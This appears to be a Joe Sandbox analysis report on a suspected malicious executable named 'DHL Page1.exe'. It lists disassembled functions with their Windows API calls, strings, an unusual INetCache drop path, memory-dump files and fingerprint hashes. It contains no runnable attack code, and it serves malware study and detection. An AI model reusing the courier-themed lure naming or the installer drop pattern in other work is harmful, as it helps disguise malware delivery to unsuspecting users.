Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Non-executed Functions

Function 00404D0F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404D27
GetDlgItem.USER32(?,00000408), ref: 00404D32
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D7C
LoadBitmapW.USER32(0000006E), ref: 00404D8F
SetWindowLongW.USER32(?,000000FC,00405307), ref: 00404DA8
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DBC
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DCE
SendMessageW.USER32(?,00001109,00000002), ref: 00404DE4
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DF0
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E02
DeleteObject.GDI32(00000000), ref: 00404E05
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E30
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E3C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404ED2
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EFD
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F11
GetWindowLongW.USER32(?,000000F0), ref: 00404F40
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F4E
ShowWindow.USER32(?,00000005), ref: 00404F5F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040505C
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004050C1
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050D6
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050FA
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040511A
ImageList_Destroy.COMCTL32(?), ref: 0040512F
GlobalFree.KERNEL32(?), ref: 0040513F
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004051B8
SendMessageW.USER32(?,00001102,?,?), ref: 00405261
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405270
InvalidateRect.USER32(?,00000000,?), ref: 00405290
ShowWindow.USER32(?,00000000), ref: 004052DE
GetDlgItem.USER32(?,000003FE), ref: 004052E9
ShowWindow.USER32(00000000), ref: 004052F0

Strings

M, xrefs: 00404EB9
, xrefs: 004052C8
N, xrefs: 00404F9A

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: c677ae728f418b72101c7994113019e3d5850be06ddcd651e5a6c075c9853ee2
Instruction ID: 59d51457869188ad52b443670c357e645d14acd51ea8025bb7b4989ae9bead0d
Opcode Fuzzy Hash: c677ae728f418b72101c7994113019e3d5850be06ddcd651e5a6c075c9853ee2
Instruction Fuzzy Hash: 52026EB0900209EFEB109F94DD85AAE7BB5FB44314F14817AF611BA2E1CB789D42DF58

Function 00404793 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004047E2
SetWindowTextW.USER32(00000000,-00436000), ref: 0040480C
SHBrowseForFolderW.SHELL32(?), ref: 004048BD
CoTaskMemFree.OLE32(00000000), ref: 004048C8
lstrcmpiW.KERNEL32(Call,0042D288,00000000,?,-00436000), ref: 004048FA
lstrcatW.KERNEL32(-00436000,Call), ref: 00404906
SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404918

Part of subcall function 0040595D: GetDlgItemTextW.USER32(?,?,00000400,0040494F), ref: 00405970

Part of subcall function 004064C8: CharNextW.USER32(?,*?|<>/":,00000000,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040652B
Part of subcall function 004064C8: CharNextW.USER32(?,?,?,00000000), ref: 0040653A
Part of subcall function 004064C8: CharNextW.USER32(?,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040653F
Part of subcall function 004064C8: CharPrevW.USER32(?,?,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00406552

GetDiskFreeSpaceW.KERNEL32(0042B258,?,?,0000040F,?,0042B258,0042B258,-00436000,?,0042B258,-00436000,-00436000,000003FB,-00436000), ref: 004049DB
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049F6

Part of subcall function 00404B4F: lstrlenW.KERNEL32(0042D288,0042D288,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404BF0
Part of subcall function 00404B4F: wsprintfW.USER32 ref: 00404BF9
Part of subcall function 00404B4F: SetDlgItemTextW.USER32(?,0042D288), ref: 00404C0C

Strings

Call, xrefs: 004048F4, 004048F9, 00404904
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 004048E3
A, xrefs: 004048B6

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$Call
API String ID: 2624150263-1009521253
Opcode ID: 1b2fc34563f76bf61f83b667b20011d998477ff675dccd00e8a19e5129c6032b
Instruction ID: 45aaea629e48a7dd69d477076305d6375789d7bfa395dacba7312c4f8929353f
Opcode Fuzzy Hash: 1b2fc34563f76bf61f83b667b20011d998477ff675dccd00e8a19e5129c6032b
Instruction Fuzzy Hash: 13A18EF1A00209ABDB11AFA5CD45AAFB7B8EF84714F10807BF611B62D1D77889418F6D

Function 00406A4D Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c28db2716f7418e6426b6b0ec8d93621af288b2b8bbe9631545a7d6a933ec2
Instruction ID: 85afa31a812d1303c4ab180d4afb6369a73cfcef318546f17be8133eb081361b
Opcode Fuzzy Hash: 20c28db2716f7418e6426b6b0ec8d93621af288b2b8bbe9631545a7d6a933ec2
Instruction Fuzzy Hash: 95E18971A04709DFDB24CF58C880BAAB7F5FB45305F15842EE4A7AB2D1D738AA91CB04

Function 00407224 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2920c341a9a1d76e0493e385feff17d8f9932f604053425012d67906270e821b
Instruction ID: 564d74dd85b05f1e5e36e571070c9b926b4df29f1dff4fc62af0c2e15a1c89df
Opcode Fuzzy Hash: 2920c341a9a1d76e0493e385feff17d8f9932f604053425012d67906270e821b
Instruction Fuzzy Hash: 97C14831E042599BCF14CF68C8905EEBBB2FF99314F25826AD85677380D738A942CF95

Function 00404495 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404533
GetDlgItem.USER32(?,000003E8), ref: 00404547
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404564
GetSysColor.USER32(?), ref: 00404575
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404583
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404591
lstrlenW.KERNEL32(?), ref: 00404596
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004045B8
GetDlgItem.USER32(?,0000040A), ref: 00404611
SendMessageW.USER32(00000000), ref: 00404618
GetDlgItem.USER32(?,000003E8), ref: 00404643
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404686
LoadCursorW.USER32(00000000,00007F02), ref: 00404694
SetCursor.USER32(00000000), ref: 00404697
ShellExecuteW.SHELL32(0000070B,open,00432EC0,00000000,00000000,?), ref: 004046AC
LoadCursorW.USER32(00000000,00007F00), ref: 004046B8
SetCursor.USER32(00000000), ref: 004046BB
SendMessageW.USER32(00000111,?,00000000), ref: 004046EA
SendMessageW.USER32(00000010,00000000,00000000), ref: 004046FC

Strings

Call, xrefs: 00404672
open, xrefs: 004046A4
N, xrefs: 00404631

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 23ba4926f2af4e3002159a8cecaad795e2373b7570d19f5d1db836182dd8a1ae
Instruction ID: e5e8d6a75732f79a66591b86f6074e0eb71284cea18164b411d2f65b54fa01cd
Opcode Fuzzy Hash: 23ba4926f2af4e3002159a8cecaad795e2373b7570d19f5d1db836182dd8a1ae
Instruction Fuzzy Hash: 3E71A2B1900209BFDB109F64DD85E6A7B69FB85345F00813AF705B61E1C778A951CFA8

Function 00405F63 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430928,NUL,?,00000000,?,?,004060F6,?,?), ref: 00405F72
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,004060F6,?,?), ref: 00405F96
GetShortPathNameW.KERNEL32(?,00430928,00000400), ref: 00405F9F

Part of subcall function 00405D6E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D7E
Part of subcall function 00405D6E: lstrlenA.KERNEL32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DB0

GetShortPathNameW.KERNEL32(00431128,00431128,00000400), ref: 00405FBC
wsprintfA.USER32 ref: 00405FDA
GetFileSize.KERNEL32(00000000,00000000,00431128,C0000000,00000004,00431128,?,?,?,?,?), ref: 00406015
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406024
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040605C
SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,00430528,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 004060B2
GlobalFree.KERNEL32(00000000), ref: 004060C3
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060CA

Part of subcall function 00405E09: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
Part of subcall function 00405E09: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F

Strings

[Rename], xrefs: 00406044, 00406056
(C, xrefs: 00405F67
%ls=%ls, xrefs: 00405FD0
NUL, xrefs: 00405F6C

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$(C$NUL$[Rename]
API String ID: 222337774-72960442
Opcode ID: 7553ad5cd71c1ef7a98dd65b51d8272dbea6620f94bcf13e55a0f0d5cc37ec1b
Instruction ID: c67de212038e3a4af8140532607d6f3a547529e5eadb3b3fd184e868b7ff9b5d
Opcode Fuzzy Hash: 7553ad5cd71c1ef7a98dd65b51d8272dbea6620f94bcf13e55a0f0d5cc37ec1b
Instruction Fuzzy Hash: D0315130240714BFC220AB618C08F6B3A5CEF45754F19043BBE46F72C2EA7C98218ABD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 426f8331f305b440d8f3c7315c7afc314279e01a7aa5745e62d85699e054dbbd
Instruction ID: f7911764392b9a17fffa549c6d134d4cd78750cd14e3def71fe8602ed1918a64
Opcode Fuzzy Hash: 426f8331f305b440d8f3c7315c7afc314279e01a7aa5745e62d85699e054dbbd
Instruction Fuzzy Hash: 6E418C71800209AFCF058F95DE459AFBBB9FF44311F04842EF991AA1A0C738EA54DFA4

Function 004064C8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040652B
CharNextW.USER32(?,?,?,00000000), ref: 0040653A
CharNextW.USER32(?,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040653F
CharPrevW.USER32(?,?,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00406552

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 004064C8
*?|<>/":, xrefs: 0040651A
C:\Users\user\AppData\Local\Temp\, xrefs: 004064C9

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2015293035
Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction ID: aa88e0b7aecc0033cd1108ea3c2cad879a6bfb3d08b9415eadf08646bb23ef80
Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction Fuzzy Hash: 6711B615800612A5DB303B14AD40A7766F8AF55754B52803FE996732C5E77C8C9286BD

Function 0040435F Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040437C
GetSysColor.USER32(00000000), ref: 00404398
SetTextColor.GDI32(?,00000000), ref: 004043A4
SetBkMode.GDI32(?,?), ref: 004043B0
GetSysColor.USER32(?), ref: 004043C3
SetBkColor.GDI32(?,?), ref: 004043D3
DeleteObject.GDI32(?), ref: 004043ED
CreateBrushIndirect.GDI32(?), ref: 004043F7

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: 04f1978116a7d7d81479d7bff493c907bf48530d99e9da5d87c5abe129d5bb58
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: C22163B1500744AFCB219F68ED08B4BBBF8AF41714F05892DED96E26E0D738E914CB64

Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
